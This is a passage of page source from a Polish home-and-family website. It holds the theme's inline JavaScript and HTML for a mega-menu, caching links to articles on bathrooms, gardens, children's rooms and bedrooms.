href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/dekoracje\/\" class=\"td-post-category\">Dekoracje<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/rolety-dzien-noc-dlaczego-sa-tak-popularne\/\" rel=\"bookmark\" title=\"Rolety dzie\u0144 noc \u2013 dlaczego s\u0105 tak popularne?\">Rolety dzie\u0144 noc \u2013 dlaczego s\u0105 tak popularne?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-03-23T11:07:55+00:00\" >23 marca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_33_5c5e20b793bd7","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_33_5c5e20b793bd7));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 86;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-prawidlowo-umyc-toalete\/\" rel=\"bookmark\" title=\"Jak prawid\u0142owo umy\u0107 toalet\u0119?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/bathroom-1228427_1280-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/bathroom-1228427_1280-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/bathroom-1228427_1280-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2019\/01\/bathroom-1228427_1280-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak prawid\u0142owo umy\u0107 toalet\u0119?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/kuchnia-i-lazienka\/\" class=\"td-post-category\">Kuchnia i \u0141azienka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-prawidlowo-umyc-toalete\/\" rel=\"bookmark\" title=\"Jak prawid\u0142owo umy\u0107 toalet\u0119?\">Jak prawid\u0142owo umy\u0107 toalet\u0119?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2019-01-22T14:48:42+00:00\" >22 stycznia 2019<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/w-jaki-sposob-wyczarowac-lazienke-w-stylu-retro\/\" rel=\"bookmark\" title=\"W jaki spos\u00f3b wyczarowa\u0107 \u0142azienk\u0119 w stylu retro?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/zdjecie_publikacja_228_erodzina.com_-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/zdjecie_publikacja_228_erodzina.com_-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/zdjecie_publikacja_228_erodzina.com_-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/zdjecie_publikacja_228_erodzina.com_-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"W jaki spos\u00f3b wyczarowa\u0107 \u0142azienk\u0119 w stylu retro?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/kuchnia-i-lazienka\/\" class=\"td-post-category\">Kuchnia i \u0141azienka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/w-jaki-sposob-wyczarowac-lazienke-w-stylu-retro\/\" rel=\"bookmark\" title=\"W jaki spos\u00f3b wyczarowa\u0107 \u0142azienk\u0119 w stylu retro?\">W jaki spos\u00f3b wyczarowa\u0107 \u0142azienk\u0119 w stylu retro?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-29T21:20:41+00:00\" >29 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/gdzie-umiescic-kuchnie-wolnostojaca\/\" rel=\"bookmark\" title=\"Gdzie umie\u015bci\u0107 kuchni\u0119 wolnostoj\u0105c\u0105?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/663f814570843f0643f952ff04976e25-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/663f814570843f0643f952ff04976e25-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/663f814570843f0643f952ff04976e25-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/663f814570843f0643f952ff04976e25-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Gdzie umie\u015bci\u0107 kuchni\u0119 wolnostoj\u0105c\u0105?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/kuchnia-i-lazienka\/\" class=\"td-post-category\">Kuchnia i \u0141azienka<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/gdzie-umiescic-kuchnie-wolnostojaca\/\" rel=\"bookmark\" title=\"Gdzie umie\u015bci\u0107 kuchni\u0119 wolnostoj\u0105c\u0105?\">Gdzie umie\u015bci\u0107 kuchni\u0119 wolnostoj\u0105c\u0105?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-17T16:52:50+00:00\" >17 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_33_5c5e20b793bd7","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_33_5c5e20b793bd7));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 90;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/ogrod-marzen-dla-twojego-malucha-drewniane-domki-dla-dzieci\/\" rel=\"bookmark\" title=\"Ogr\u00f3d marze\u0144 dla Twojego malucha \u2013 drewniane domki dla dzieci!\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/05\/dzieci2-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/05\/dzieci2-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/05\/dzieci2-300x224.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/05\/dzieci2-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/05\/dzieci2-245x184.jpg 245w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/05\/dzieci2.jpg 600w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Ogr\u00f3d marze\u0144 dla Twojego malucha \u2013 drewniane domki dla dzieci!\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/ogrod-i-taras\/\" class=\"td-post-category\">Ogr\u00f3d i Taras<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/ogrod-marzen-dla-twojego-malucha-drewniane-domki-dla-dzieci\/\" rel=\"bookmark\" title=\"Ogr\u00f3d marze\u0144 dla Twojego malucha \u2013 drewniane domki dla dzieci!\">Ogr\u00f3d marze\u0144 dla Twojego malucha \u2013 drewniane domki dla dzieci!<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-05-17T17:49:50+00:00\" >17 maja 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/akcesoria-dzieki-ktorym-twoj-basen-bedzie-idealnie-wyposazony\/\" rel=\"bookmark\" title=\"Akcesoria, dzi\u0119ki kt\u00f3rym Tw\u00f3j basen b\u0119dzie idealnie wyposa\u017cony\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/01\/pool-690034_1920.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/01\/pool-690034_1920.jpg 1000w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/01\/pool-690034_1920-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/01\/pool-690034_1920-768x511.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/01\/pool-690034_1920-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/01\/pool-690034_1920-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Akcesoria, dzi\u0119ki kt\u00f3rym Tw\u00f3j basen b\u0119dzie idealnie wyposa\u017cony\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/ogrod-i-taras\/\" class=\"td-post-category\">Ogr\u00f3d i Taras<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/akcesoria-dzieki-ktorym-twoj-basen-bedzie-idealnie-wyposazony\/\" rel=\"bookmark\" title=\"Akcesoria, dzi\u0119ki kt\u00f3rym Tw\u00f3j basen b\u0119dzie idealnie wyposa\u017cony\">Akcesoria, dzi\u0119ki kt\u00f3rym Tw\u00f3j basen b\u0119dzie idealnie wyposa\u017cony<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-01-11T09:22:36+00:00\" >11 stycznia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/ogarnij-swoj-ogrod-wiosne\/\" rel=\"bookmark\" title=\"Ogarnij sw\u00f3j ogr\u00f3d na wiosn\u0119\"><img width=\"260\" height=\"173\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/01\/Erodzina.com-Ogr\u00f3d.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/01\/Erodzina.com-Ogr\u00f3d.jpg 960w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/01\/Erodzina.com-Ogr\u00f3d-300x200.jpg 300w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/01\/Erodzina.com-Ogr\u00f3d-768x512.jpg 768w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/01\/Erodzina.com-Ogr\u00f3d-127x85.jpg 127w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/01\/Erodzina.com-Ogr\u00f3d-101x68.jpg 101w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Ogarnij sw\u00f3j ogr\u00f3d na wiosn\u0119\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/ogrod-i-taras\/\" class=\"td-post-category\">Ogr\u00f3d i Taras<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/ogarnij-swoj-ogrod-wiosne\/\" rel=\"bookmark\" title=\"Ogarnij sw\u00f3j ogr\u00f3d na wiosn\u0119\">Ogarnij sw\u00f3j ogr\u00f3d na wiosn\u0119<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-01-11T09:09:04+00:00\" >11 stycznia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_33_5c5e20b793bd7","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_33_5c5e20b793bd7));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 88;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/5-rzeczy-ktorych-nie-moze-zabraknac-w-pokoju-pierwszoklasisty\/\" rel=\"bookmark\" title=\"5 rzeczy, kt\u00f3rych nie mo\u017ce zabrakn\u0105\u0107 w pokoju pierwszoklasisty\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/dzieci-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/dzieci-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/dzieci-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/10\/dzieci-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"5 rzeczy, kt\u00f3rych nie mo\u017ce zabrakn\u0105\u0107 w pokoju pierwszoklasisty\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/pokoj-dzieciecy\/\" class=\"td-post-category\">Pok\u00f3j Dzieci\u0119cy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/5-rzeczy-ktorych-nie-moze-zabraknac-w-pokoju-pierwszoklasisty\/\" rel=\"bookmark\" title=\"5 rzeczy, kt\u00f3rych nie mo\u017ce zabrakn\u0105\u0107 w pokoju pierwszoklasisty\">5 rzeczy, kt\u00f3rych nie mo\u017ce zabrakn\u0105\u0107 w pokoju pierwszoklasisty<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-10-01T12:27:40+00:00\" >1 pa\u017adziernika 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/dobor-tkanin-do-pokoju-dzieciecego-urok-tkwi-w-szczegolach\/\" rel=\"bookmark\" title=\"Dob\u00f3r tkanin do pokoju dzieci\u0119cego \u2013 urok tkwi w szczeg\u00f3\u0142ach\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/baby_bed_child_cute_fashion_girl_indoors_kid-958868-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/baby_bed_child_cute_fashion_girl_indoors_kid-958868-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/baby_bed_child_cute_fashion_girl_indoors_kid-958868-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/09\/baby_bed_child_cute_fashion_girl_indoors_kid-958868-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Dob\u00f3r tkanin do pokoju dzieci\u0119cego \u2013 urok tkwi w szczeg\u00f3\u0142ach\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/pokoj-dzieciecy\/\" class=\"td-post-category\">Pok\u00f3j Dzieci\u0119cy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/dobor-tkanin-do-pokoju-dzieciecego-urok-tkwi-w-szczegolach\/\" rel=\"bookmark\" title=\"Dob\u00f3r tkanin do pokoju dzieci\u0119cego \u2013 urok tkwi w szczeg\u00f3\u0142ach\">Dob\u00f3r tkanin do pokoju dzieci\u0119cego \u2013 urok tkwi w szczeg\u00f3\u0142ach<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-09-24T11:36:07+00:00\" >24 wrze\u015bnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/lozka-domek-natura-dla-twojego-dziecka\/\" rel=\"bookmark\" title=\"\u0141\u00f3\u017cka domek &#8211; natura dla Twojego dziecka\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/miles10x-sklep_big-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/miles10x-sklep_big-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/miles10x-sklep_big-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/08\/miles10x-sklep_big-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"\u0141\u00f3\u017cka domek &#8211; natura dla Twojego dziecka\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/pokoj-dzieciecy\/\" class=\"td-post-category\">Pok\u00f3j Dzieci\u0119cy<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/lozka-domek-natura-dla-twojego-dziecka\/\" rel=\"bookmark\" title=\"\u0141\u00f3\u017cka domek &#8211; natura dla Twojego dziecka\">\u0141\u00f3\u017cka domek &#8211; natura dla Twojego dziecka<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-08-06T12:10:19+00:00\" >6 sierpnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_33_5c5e20b793bd7","td_hide_prev":true,"td_hide_next":false}));
                                                    tmpObj = JSON.parse(JSON.stringify(block_td_uid_33_5c5e20b793bd7));
                            tmpObj.is_ajax_running = true;
                            tmpObj.td_current_page = 1;
                            tmpObj.td_filter_value = 87;
                            var currentBlockObjSignature = JSON.stringify(tmpObj);
                            tdLocalCache.set(currentBlockObjSignature, JSON.stringify({"td_data":"<div class=\"td-mega-row\"><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/oczyszczacz-powietrza-czy-warto-kupic\/\" rel=\"bookmark\" title=\"Oczyszczacz powietrza czy warto kupi\u0107?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/oczyszczaczpowietrza1-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/oczyszczaczpowietrza1-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/oczyszczaczpowietrza1-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/12\/oczyszczaczpowietrza1-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Oczyszczacz powietrza czy warto kupi\u0107?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/salon-i-sypialnia\/\" class=\"td-post-category\">Salon i Sypialnia<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/oczyszczacz-powietrza-czy-warto-kupic\/\" rel=\"bookmark\" title=\"Oczyszczacz powietrza czy warto kupi\u0107?\">Oczyszczacz powietrza czy warto kupi\u0107?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-12-13T20:01:44+00:00\" >13 grudnia 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-urzadzic-sypialnie\/\" rel=\"bookmark\" title=\"Jak urz\u0105dzi\u0107 sypialni\u0119?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/b27b20532208ca2d7cdc7b5fe7b3de4c-260x195.png\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/b27b20532208ca2d7cdc7b5fe7b3de4c-260x195.png 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/b27b20532208ca2d7cdc7b5fe7b3de4c-80x60.png 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/07\/b27b20532208ca2d7cdc7b5fe7b3de4c-245x184.png 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak urz\u0105dzi\u0107 sypialni\u0119?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/salon-i-sypialnia\/\" class=\"td-post-category\">Salon i Sypialnia<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-urzadzic-sypialnie\/\" rel=\"bookmark\" title=\"Jak urz\u0105dzi\u0107 sypialni\u0119?\">Jak urz\u0105dzi\u0107 sypialni\u0119?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-07-19T17:42:58+00:00\" >19 lipca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><div class=\"td-mega-span\">\r\n        <div class=\"td_module_mega_menu\">\r\n            <div class=\"td-module-image\">\r\n                <div class=\"td-module-thumb\"><a href=\"http:\/\/www.erodzina.com\/jak-wybrac-lozko-do-sypialni\/\" rel=\"bookmark\" title=\"Jak wybra\u0107 \u0142\u00f3\u017cko do sypialni?\"><img width=\"260\" height=\"195\" class=\"entry-thumb\" src=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/778f36831f64ce4fcb77ce8820c7e3cc-260x195.jpg\" srcset=\"http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/778f36831f64ce4fcb77ce8820c7e3cc-260x195.jpg 260w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/778f36831f64ce4fcb77ce8820c7e3cc-80x60.jpg 80w, http:\/\/www.erodzina.com\/wp-content\/uploads\/2018\/06\/778f36831f64ce4fcb77ce8820c7e3cc-245x184.jpg 245w\" sizes=\"(max-width: 260px) 100vw, 260px\" alt=\"\" title=\"Jak wybra\u0107 \u0142\u00f3\u017cko do sypialni?\"\/><\/a><\/div>                <div class=\"td-post-category-wrap\"><a href=\"http:\/\/www.erodzina.com\/kategoria\/dom-i-mieszkanie\/salon-i-sypialnia\/\" class=\"td-post-category\">Salon i Sypialnia<\/a><\/div>\r\n            <\/div>\r\n\r\n            <div class=\"td-item-details\">\r\n                <h3 class=\"entry-title td-module-title\"><a href=\"http:\/\/www.erodzina.com\/jak-wybrac-lozko-do-sypialni\/\" rel=\"bookmark\" title=\"Jak wybra\u0107 \u0142\u00f3\u017cko do sypialni?\">Jak wybra\u0107 \u0142\u00f3\u017cko do sypialni?<\/a><\/h3>                <span class=\"td-post-date\"><time class=\"entry-date updated td-module-date\" datetime=\"2018-06-29T17:54:17+00:00\" >29 czerwca 2018<\/time><\/span>            <\/div>\r\n        <\/div>\r\n        <\/div><\/div>","td_block_id":"td_uid_33_5c5e20b793bd7","td_hide_prev":true,"td_hide_next":false}));
                                    </script>
            <div class="td-container td_block_wrap td_block_mega_menu td_uid_33_5c5e20b793bd7_rand td_with_ajax_pagination td-pb-border-top td_block_template_1" data-td-block-uid="td_uid_33_5c5e20b793bd7"><div class="td_mega_menu_sub_cats"><div class="block-mega-child-cats"><a class="mega-menu-sub-cat-td_uid_33_5c5e20b793bd7" id="td_uid_34_5c5e20b793fab" data-td_block_id="td_uid_33_5c5e20b793bd7" data-td_filter_value="92" href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/budujemy-i-remontujemy/">Budujemy i Remontujemy</a><a class="mega-menu-sub-cat-td_uid_33_5c5e20b793bd7" id="td_uid_35_5c5e20b793fdd" data-td_block_id="td_uid_33_5c5e20b793bd7" data-td_filter_value="91" href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/dekoracje/">Dekoracje</a><a class="mega-menu-sub-cat-td_uid_33_5c5e20b793bd7" id="td_uid_36_5c5e20b794006" data-td_block_id="td_uid_33_5c5e20b793bd7" data-td_filter_value="86" href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/kuchnia-i-lazienka/">Kuchnia i Łazienka</a><a class="mega-menu-sub-cat-td_uid_33_5c5e20b793bd7" id="td_uid_37_5c5e20b79402b" data-td_block_id="td_uid_33_5c5e20b793bd7" data-td_filter_value="90" href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/ogrod-i-taras/">Ogród i Taras</a><a class="mega-menu-sub-cat-td_uid_33_5c5e20b793bd7" id="td_uid_38_5c5e20b794050" data-td_block_id="td_uid_33_5c5e20b793bd7" data-td_filter_value="88" href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/pokoj-dzieciecy/">Pokój Dziecięcy</a><a class="mega-menu-sub-cat-td_uid_33_5c5e20b793bd7" id="td_uid_39_5c5e20b794073" data-td_block_id="td_uid_33_5c5e20b793bd7" data-td_filter_value="87" href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/salon-i-sypialnia/">Salon i Sypialnia</a><a class="cur-sub-cat mega-menu-sub-cat-td_uid_33_5c5e20b793bd7 mega-menu-cat-all" id="td_uid_40_5c5e20b794096" data-td_block_id="td_uid_33_5c5e20b793bd7" data-td_filter_value="" href="http://www.erodzina.com/kategoria/dom-i-mieszkanie/">Wszystko Dom i Mieszkanie</a></div></div><div id="td_uid_33_5c5e20b793bd7" class="td_block_inner"><div class="td-mega-row"><div class="td-mega-span">
        <div class="td_module_mega_menu">
            <div class="td-module-image">
